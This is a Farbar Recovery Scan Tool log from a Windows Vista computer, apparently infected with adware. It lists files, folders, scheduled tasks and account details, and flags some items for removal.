2008-01-20 20:23 - 2008-01-20 20:23 - 000018944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbprint.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000017976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wmilib.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000017976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelide.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000016440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msisadrv.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000015360 _____ (Microsoft Corporation) C:\Windows\system32\wsock32.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000015360 _____ (Microsoft Corporation) C:\Windows\system32\serialui.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000015360 _____ (Microsoft Corporation) C:\Windows\system32\nbtstat.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000015360 _____ (Microsoft Corporation) C:\Windows\system32\bridgeunattend.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000015288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\swenum.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000015181 _____ C:\Windows\system32\gatherWirelessInfo.vbs
2008-01-20 20:23 - 2008-01-20 20:23 - 000014208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\CmBatt.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000013824 _____ (Microsoft Corporation) C:\Windows\system32\ktmutil.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\setupSNK.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\irenum.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bdasup.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000011776 _____ (Microsoft Corporation) C:\Windows\system32\sbunattend.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000009728 _____ (Microsoft Corporation) C:\Windows\system32\wscproxystub.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\iscsied.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000007680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\umpass.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\sdspres.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000006144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\beep.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000005632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmkaud.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000004608 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\null.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\bootstr.dll
2008-01-20 20:03 - 2008-01-20 20:27 - 000458752 _____ C:\Windows\system32\InstallPackage_ETW.Log.perf
2008-01-20 20:03 - 2008-01-20 20:27 - 000458752 _____ C:\Windows\system32\InstallPackage_ETW.Log.dpx
2007-07-11 19:49 - 2018-10-30 18:35 - 000000000 ____D C:\Windows\Panther
2007-06-05 01:30 - 2007-06-05 01:30 - 000041296 ____R (Microsoft Corporation) C:\Windows\system32\hlp95en.dll
2007-04-24 19:51 - 2018-10-29 10:46 - 000000000 ____D C:\Temp
2007-04-23 10:50 - 2007-04-23 10:50 - 000025896 _____ (Windows (R) Codename Longhorn DDK provider) C:\Windows\system32\Drivers\RtlProt.sys
2007-04-10 15:11 - 2007-04-10 15:11 - 000511328 _____ (Microsoft Corporation) C:\Windows\system32\capicom.dll
2007-03-25 20:10 - 2007-03-25 20:10 - 000000000 ____D C:\Windows\Quicky Translator
2007-03-25 20:08 - 2016-01-05 15:13 - 007001859 _____ C:\Users\Public\Documents\windows.exe
2007-03-25 17:18 - 2007-03-25 20:15 - 000000000 ____D C:\Users\Angela\AppData\Local\gmsd_us_005010200
2007-03-25 17:18 - 2007-03-25 20:11 - 000000000 ____D C:\Program Files\gmsd_us_005010200
2007-03-24 17:20 - 2007-03-24 17:24 - 000000000 ____D C:\Users\Angela\AppData\Local\gmsd_us_005010199
2007-03-24 17:20 - 2007-03-24 17:21 - 000000000 ____D C:\Program Files\gmsd_us_005010199
2007-03-24 17:18 - 2007-03-24 17:18 - 000000000 ____D C:\ProgramData\LolliScan
2007-03-24 17:17 - 2018-10-31 01:11 - 000000000 ____D C:\ProgramData\Service1291
2007-03-24 17:17 - 2007-03-24 17:17 - 000000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e
2007-03-24 17:17 - 2007-03-20 00:11 - 000000344 ____H C:\Windows\Tasks\UOEJSMCMOGWSTARU.job
2007-03-20 03:32 - 2015-07-21 14:55 - 001206192 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2007-03-20 03:32 - 2015-07-21 10:07 - 003605440 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2007-03-20 03:32 - 2015-07-21 10:07 - 003553216 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2007-03-20 03:32 - 2015-07-21 10:07 - 000140224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ecache.sys
2007-03-20 03:32 - 2015-07-21 10:07 - 000056256 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2007-03-20 03:32 - 2015-07-21 10:03 - 000564224 _____ (Microsoft Corporation) C:\Windows\system32\emdmgmt.dll
2007-03-20 03:32 - 2015-07-21 10:03 - 000049664 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2007-03-20 03:32 - 2015-07-21 10:03 - 000010752 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
2007-03-20 03:09 - 2015-07-18 10:03 - 000068608 _____ (Microsoft Corporation) C:\Windows\system32\basesrv.dll
2007-03-20 02:19 - 2007-03-20 02:19 - 000000008 _____ C:\END
2007-03-20 02:18 - 2018-10-30 23:22 - 000000000 ____D C:\Program Files\74697254-1174378719-2D2D-2D2D-0003254135CB
2007-03-20 02:17 - 2007-03-20 02:17 - 000000000 ____D C:\Program Files\QualityChecker
2007-03-20 02:08 - 2018-10-29 21:10 - 000000000 ____D C:\ProgramData\c6b12a7f-37b5-0
2007-03-20 02:08 - 2018-10-29 21:10 - 000000000 ____D C:\ProgramData\c6b12a7f-0753-1
2007-03-20 02:06 - 2018-10-31 00:55 - 000000000 ____D C:\Users\Angela\AppData\Roaming\Genius
2007-03-20 02:05 - 2018-10-31 01:11 - 000000000 ____D C:\Users\Angela\AppData\Roaming\Sixth
2007-03-20 02:05 - 2018-10-31 01:11 - 000000000 ____D C:\Users\Angela\AppData\Roaming\Seventh
2007-03-20 02:05 - 2007-03-20 02:05 - 000000000 ____D C:\Users\Angela\AppData\Roaming\FunFeedr
2007-03-20 02:05 - 2007-03-20 02:05 - 000000000 ____D C:\Users\Angela\AppData\Roaming\Common
2007-03-20 01:56 - 2018-10-29 10:52 - 000000000 ____D C:\Users\Angela\AppData\Roaming\systweak
2007-03-20 01:56 - 2015-11-20 19:27 - 000017840 _____ () C:\Windows\system32\roboot.exe
2007-03-20 01:56 - 2007-03-20 01:56 - 050987008 _____ C:\Windows\ocsetup_install_OEMHelpCustomization.etl
2007-03-20 01:56 - 2007-03-20 01:56 - 000301936 _____ (Microsoft Corporation) C:\Windows\WLXPGSS.SCR
2007-03-20 01:56 - 2007-03-20 01:56 - 000196608 _____ C:\Windows\ocsetup_cbs_install_OEMHelpCustomization.perf
2007-03-20 01:56 - 2007-03-20 01:56 - 000065536 _____ C:\Windows\ocsetup_cbs_install_OEMHelpCustomization.dpx
2007-03-20 01:56 - 2007-03-20 01:56 - 000008192 ___RS C:\BOOTSECT.BAK
2007-03-20 01:56 - 2007-03-20 01:56 - 000002400 _____ C:\Windows\MOD01OPK0400860001.enc
2007-03-20 01:56 - 2007-03-20 01:56 - 000002060 _____ C:\Windows\MOD01SET0J00860005.enc
2007-03-20 01:56 - 2007-03-20 01:56 - 000001976 _____ C:\Windows\MOD01SET000000009E.enc
2007-03-20 01:56 - 2007-03-20 01:56 - 000000045 _____ C:\user.js
2007-03-20 01:56 - 2007-03-20 01:56 - 000000016 _____ C:\Windows\popcinfo.dat
2007-03-20 01:56 - 2007-03-20 01:56 - 000000010 _____ C:\Windows\CSUP.TXT
2007-03-20 01:50 - 2007-03-20 01:50 - 000000000 ___HD C:\Users\Public\Documents\SystemData
2007-03-20 01:50 - 2007-03-20 01:50 - 000000000 ____D C:\Program Files\Windows Network Services
2007-03-20 01:48 - 2018-10-30 17:20 - 000000000 ____D C:\Users\Angela\AppData\Local\gmsd_us_005010193
2007-03-20 01:48 - 2007-03-25 20:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GAMESDESKTOP
2007-03-20 01:48 - 2007-03-20 01:49 - 000000000 ____D C:\Program Files\gmsd_us_005010193
2007-03-20 01:46 - 2007-03-20 01:46 - 000000000 ____D C:\ProgramData\Xoiihrsematu
2007-03-20 01:45 - 2018-10-29 21:10 - 000000000 ____D C:\ProgramData\ca85ed86-3fd5-1
2007-03-20 01:45 - 2018-10-29 21:10 - 000000000 ____D C:\ProgramData\ca85ed86-30a1-0
2007-03-20 01:42 - 2018-10-30 13:01 - 000000000 ____D C:\ProgramData\DataFile
2007-03-20 01:23 - 2018-10-30 13:13 - 000000000 ____D C:\Users\Angela\AppData\Roaming\chrome
2007-03-20 01:02 - 2007-03-20 01:03 - 000009977 _____ C:\Users\Angela\Desktop\FRST.txt
2007-03-20 01:02 - 2007-03-20 01:02 - 000000000 ____D C:\FRST
2007-03-20 01:01 - 2018-10-31 11:00 - 001774592 _____ (Farbar) C:\Users\Angela\Desktop\FRST.exe
2007-03-20 00:12 - 2007-03-20 00:12 - 000078032 ____N (Absolute Software Corp.) C:\Windows\system32\rpcnet.exe
2007-03-20 00:12 - 2007-03-20 00:12 - 000078032 _____ (Absolute Software Corp.) C:\Windows\system32\rpcnet.dll
2007-03-20 00:05 - 2007-03-20 00:12 - 000017408 _____ C:\Windows\system32\rpcnetp.exe
2007-03-20 00:05 - 2007-03-20 00:11 - 000017408 _____ C:\Windows\system32\rpcnetp.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-31 01:34 - 2006-11-02 07:01 - 000032572 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2018-10-30 19:00 - 2006-11-02 05:18 - 000000000 ___SD C:\Windows\Downloaded Program Files
2018-10-30 16:17 - 2006-11-02 06:47 - 000345464 _____ C:\Windows\system32\FNTCACHE.DAT
2015-11-18 14:10 - 2006-11-02 06:37 - 000000000 ____D C:\Windows\system32\XPSViewer
2015-07-28 11:01 - 2006-11-02 04:24 - 129304528 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2015-06-12 03:52 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\rescache
2015-05-16 10:56 - 2006-11-02 06:37 - 000000000 ____D C:\Program Files\Windows Journal
2015-04-13 14:17 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\Resources
2015-03-04 19:00 - 2006-11-02 04:23 - 000000246 _____ C:\Windows\win.ini
2013-10-28 20:10 - 2006-11-02 06:37 - 000000000 ___RD C:\Users\Public\Recorded TV
2013-05-31 12:30 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\LiveKernelReports
2012-04-03 03:04 - 2006-11-02 05:18 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2012-02-23 11:36 - 2006-11-02 05:18 - 000000000 ___RD C:\Windows\Offline Web Pages
2012-02-23 11:36 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\PolicyDefinitions
2012-02-23 11:05 - 2006-11-02 00:32 - 000008798 _____ C:\Windows\system32\icrav03.rat
2012-02-23 11:05 - 2006-11-02 00:32 - 000001988 _____ C:\Windows\system32\ticrf.rat
2012-02-20 23:10 - 2006-11-02 04:22 - 042729472 _____ C:\Windows\system32\config\software_previous
2012-02-20 23:10 - 2006-11-02 04:22 - 021233664 _____ C:\Windows\system32\config\system_previous
2012-02-20 23:09 - 2006-11-02 05:18 - 000000000 __RSD C:\Windows\Media
2012-02-20 23:09 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\spool
2012-02-20 23:09 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\Msdtc
2012-02-20 23:09 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\registration
2012-02-20 23:04 - 2006-11-02 04:22 - 039845888 _____ C:\Windows\system32\config\components_previous
2012-02-20 23:04 - 2006-11-02 04:22 - 000262144 _____ C:\Windows\system32\config\sam_previous
2012-02-20 15:12 - 2006-11-02 04:22 - 000524288 _____ C:\Windows\system32\config\default_previous
2012-02-20 14:21 - 2006-11-02 04:22 - 000262144 _____ C:\Windows\system32\config\security_previous
2011-11-19 04:01 - 2006-11-02 05:18 - 000000000 ____D C:\Program Files\Common Files\System
2011-05-05 10:01 - 2006-11-02 02:55 - 000008704 _____ (Microsoft Corporation) C:\Windows\system32\hccoin.dll
2010-08-12 03:22 - 2006-11-02 06:37 - 000000000 ____D C:\Program Files\Movie Maker
2009-11-17 04:20 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\lv-LV
2009-11-17 04:20 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\lt-LT
2009-11-17 04:20 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\et-EE
2009-10-30 15:03 - 2006-11-02 06:50 - 000001661 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
2009-10-28 03:09 - 2006-11-02 06:37 - 000000000 ____D C:\Program Files\Windows Sidebar
2009-10-28 03:09 - 2006-11-02 06:37 - 000000000 ____D C:\Program Files\Windows Photo Gallery
2009-10-28 03:09 - 2006-11-02 06:37 - 000000000 ____D C:\Program Files\Windows Defender
2009-10-28 03:09 - 2006-11-02 06:37 - 000000000 ____D C:\Program Files\Windows Collaboration
2009-10-28 03:09 - 2006-11-02 06:37 - 000000000 ____D C:\Program Files\Windows Calendar
2009-10-28 03:09 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\SLUI
2009-10-28 03:09 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\setup
2009-10-28 03:09 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\oobe
2009-10-28 03:09 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\migwiz
2009-10-28 03:09 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\manifeststore
2009-10-28 03:09 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\AdvancedInstallers
2009-10-28 03:09 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\servicing
2009-10-28 03:09 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\IME
2009-07-14 17:26 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\Help
2009-05-13 14:29 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\NDF
2009-04-11 00:32 - 2006-11-02 04:25 - 000177128 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2009-04-11 00:32 - 2006-11-02 02:30 - 000177128 _____ (Microsoft Corporation) C:\Windows\system32\halmacpi.dll
2009-04-11 00:32 - 2006-11-02 02:30 - 000140776 _____ (Microsoft Corporation) C:\Windows\system32\halacpi.dll
2009-03-11 22:58 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\sysprep
2009-03-11 22:46 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system
2009-02-23 20:28 - 2006-11-02 06:37 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2009-02-23 20:09 - 2006-11-02 06:37 - 000000000 ____D C:\Windows\ShellNew
2009-02-23 18:35 - 2006-11-02 06:37 - 000262144 _____ C:\Windows\system32\config\BCD-Template
2008-01-20 21:14 - 2006-11-02 04:22 - 016846848 _____ C:\Windows\system32\config\COMPONENTS.SAV
2008-01-20 21:14 - 2006-11-02 04:22 - 000106496 _____ C:\Windows\system32\config\DEFAULT.SAV
2008-01-20 21:14 - 2006-11-02 04:22 - 000020480 _____ C:\Windows\system32\config\SECURITY.SAV
2008-01-20 20:58 - 2006-11-02 06:47 - 000039936 _____ C:\Windows\system32\umstartup.etl
2008-01-20 20:44 - 2006-11-02 06:47 - 000279552 _____ C:\Windows\system32\umstartup000.etl
2008-01-20 20:43 - 2006-11-02 06:50 - 000000749 ___RH C:\Windows\WindowsShell.Manifest
2008-01-20 20:42 - 2006-11-02 06:55 - 000001743 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Mail.lnk
2008-01-20 20:42 - 2006-11-02 05:18 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Extras and Upgrades
2008-01-20 20:34 - 2006-11-02 06:37 - 000000000 ____D C:\Windows\DigitalLocker
2008-01-20 20:34 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\ras
2008-01-20 20:34 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\icsxml
2008-01-20 20:34 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\ias
2008-01-20 20:34 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\system32\com
2008-01-20 20:34 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\MSAgent
2008-01-20 20:34 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\L2Schemas
2008-01-20 20:26 - 2006-11-02 04:32 - 000101888 _____ (Infineon Technologies AG) C:\Windows\system32\ifxcardm.dll
2008-01-20 20:26 - 2006-11-02 04:32 - 000082432 _____ (Gemalto, Inc.) C:\Windows\system32\axaltocm.dll
2008-01-20 20:23 - 2006-11-02 03:04 - 000022632 _____ (Microsoft Corporation) C:\Windows\system32\streamci.dll
2008-01-20 20:23 - 2006-11-02 03:03 - 000248832 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpdr.sys
2008-01-20 20:23 - 2006-11-02 02:55 - 000035328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\circlass.sys
2008-01-20 20:23 - 2006-11-02 02:54 - 000022072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wd.sys
2008-01-20 20:23 - 2006-11-02 02:52 - 000105016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mpio.sys
2008-01-20 20:23 - 2006-11-02 02:52 - 000094776 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msdsm.sys
2008-01-20 20:23 - 2006-11-02 02:52 - 000024632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\crcdisk.sys
2008-01-20 20:23 - 2006-11-02 02:52 - 000019000 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\i2omgmt.sys
2008-01-20 20:23 - 2006-11-02 02:51 - 000030264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\i2omp.sys
2008-01-20 20:23 - 2006-11-02 02:51 - 000020024 _____ (VIA Technologies, Inc.) C:\Windows\system32\Drivers\viaide.sys
2008-01-20 20:23 - 2006-11-02 02:51 - 000019000 _____ (CMD Technology, Inc.) C:\Windows\system32\Drivers\cmdide.sys
2008-01-20 20:23 - 2006-11-02 02:51 - 000017976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdide.sys
2008-01-20 20:23 - 2006-11-02 02:51 - 000017464 _____ (Acer Laboratories Inc.) C:\Windows\system32\Drivers\aliide.sys
2008-01-20 20:23 - 2006-11-02 02:51 - 000016440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pciide.sys
2008-01-20 20:23 - 2006-11-02 02:51 - 000015872 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mouhid.sys
2008-01-20 20:23 - 2006-11-02 02:51 - 000015872 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\kbdhid.sys
2008-01-20 20:23 - 2006-11-02 02:51 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sffdisk.sys
2008-01-20 20:23 - 2006-11-02 02:51 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sffp_mmc.sys
2008-01-20 20:23 - 2006-11-02 02:51 - 000011776 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sffp_sd.sys
2008-01-20 20:23 - 2006-11-02 02:42 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\IPMIDrv.sys
2008-01-20 20:23 - 2006-11-02 02:38 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\kbd106.dll
2008-01-20 20:23 - 2006-11-02 02:35 - 000109112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\NV_AGP.SYS
2008-01-20 20:23 - 2006-11-02 02:35 - 000061496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\GAGP30KX.SYS
2008-01-20 20:23 - 2006-11-02 02:35 - 000060984 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ULIAGPKX.SYS
2008-01-20 20:23 - 2006-11-02 02:35 - 000059448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\UAGP35.SYS
2008-01-20 20:23 - 2006-11-02 02:35 - 000057400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\AMDAGP.SYS
2008-01-20 20:23 - 2006-11-02 02:35 - 000056888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\VIAAGP.SYS
2008-01-20 20:23 - 2006-11-02 02:35 - 000056376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\AGP440.sys
2008-01-20 20:23 - 2006-11-02 02:35 - 000055864 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\SISAGP.SYS
2008-01-20 20:23 - 2006-11-02 02:35 - 000049720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\isapnp.sys
2008-01-20 20:23 - 2006-11-02 02:35 - 000028216 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\battc.sys
2008-01-20 20:23 - 2006-11-02 02:35 - 000020792 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\compbatt.sys
2008-01-20 20:23 - 2006-11-02 02:35 - 000011264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wmiacpi.sys
2008-01-20 20:23 - 2006-11-02 02:30 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk8.sys
2008-01-20 20:23 - 2006-11-02 02:30 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\viac7.sys
2008-01-20 20:23 - 2006-11-02 02:30 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk7.sys
2008-01-20 20:23 - 2006-11-02 02:30 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\processr.sys
2008-01-20 20:23 - 2006-11-02 02:30 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\crusoe.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 001122360 _____ (QLogic Corporation) C:\Windows\system32\Drivers\ql2300.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000422968 _____ (Adaptec, Inc.) C:\Windows\system32\Drivers\adp94xx.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000342584 _____ (Emulex) C:\Windows\system32\Drivers\elxstor.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000300600 _____ (Adaptec, Inc.) C:\Windows\system32\Drivers\adpahci.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000238648 _____ (ULi Electronics Inc.) C:\Windows\system32\Drivers\uliahci.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000235064 _____ (Intel Corporation) C:\Windows\system32\Drivers\iaStorV.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000149560 _____ (Adaptec, Inc.) C:\Windows\system32\Drivers\adpu320.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000130616 _____ (VIA Technologies Inc.,Ltd) C:\Windows\system32\Drivers\vsmraid.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000115816 _____ (Promise Technology, Inc.) C:\Windows\system32\Drivers\ulsata2.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000102968 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvraid.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000101432 _____ (Adaptec, Inc.) C:\Windows\system32\Drivers\adpu160m.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000096312 _____ (LSI Logic) C:\Windows\system32\Drivers\lsi_fc.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000089656 _____ (LSI Logic) C:\Windows\system32\Drivers\lsi_sas.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000079928 _____ (Adaptec, Inc.) C:\Windows\system32\Drivers\arcsas.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000079416 _____ (Adaptec, Inc.) C:\Windows\system32\Drivers\arc.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000074808 _____ (Silicon Integrated Systems) C:\Windows\system32\Drivers\sisraid4.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000045112 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvstor.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000041016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sisraid2.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000040504 _____ (Hewlett-Packard Company) C:\Windows\system32\Drivers\HpCISSs.sys
2008-01-20 20:23 - 2006-11-02 01:36 - 000031288 _____ (LSI Corporation) C:\Windows\system32\Drivers\megasas.sys
2007-03-20 00:53 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\ModemLogs
2007-03-20 00:42 - 2006-11-02 05:18 - 000000000 ____D C:\Windows\inf
2007-03-20 00:42 - 2006-11-02 04:33 - 000759582 _____ C:\Windows\system32\PerfStringBackup.INI
2007-03-20 00:11 - 2006-11-02 06:47 - 000004384 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2007-03-20 00:11 - 2006-11-02 06:47 - 000004384 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2007-03-20 00:10 - 2006-11-02 07:01 - 000000006 ____H C:\Windows\Tasks\SA.DAT

==================== Files in the root of some directories =======

2009-11-25 14:35 - 2009-11-25 14:35 - 000087608 _____ () C:\Users\Angela\AppData\Roaming\inst.exe
2009-11-25 14:35 - 2009-11-25 14:35 - 000007887 _____ () C:\Users\Angela\AppData\Roaming\pcouffin.cat
2009-11-25 14:35 - 2009-11-25 14:35 - 000001144 _____ () C:\Users\Angela\AppData\Roaming\pcouffin.inf
2009-11-25 14:36 - 2009-11-25 14:36 - 000000034 _____ () C:\Users\Angela\AppData\Roaming\pcouffin.log
2009-11-25 14:35 - 2009-11-25 14:35 - 000047360 _____ (VSO Software) C:\Users\Angela\AppData\Roaming\pcouffin.sys
2018-10-29 10:54 - 2018-10-30 16:22 - 000000680 _____ () C:\Users\Angela\AppData\Local\d3d9caps.dat
2009-04-29 01:07 - 2014-10-24 10:23 - 000010240 _____ () C:\Users\Angela\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-10-28 20:10 - 2013-10-28 20:10 - 000000079 _____ () C:\Users\Angela\AppData\Local\DVDPATH.TXT

Files to move or delete:
====================
C:\Windows\Tasks\{05040C47-0805-0C05-0B11-0B0E05041109}.job
C:\Windows\Tasks\{080A7E47-0B08-0B0F-0411-0A047D0E1178}.job


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2007-03-20 00:16

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 24.10.2018
Ran by Angela (20-03-2007 01:04:22)
Running from C:\Users\Angela\Desktop
Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) (2009-03-12 04:40:50)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2860630475-1531993715-2310474269-500 - Administrator - Disabled)
Angela (S-1-5-21-2860630475-1531993715-2310474269-1000 - Administrator - Enabled) => C:\Users\Angela
Guest (S-1-5-21-2860630475-1531993715-2310474269-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Malwarebytes (Disabled - Out of date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Out of date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
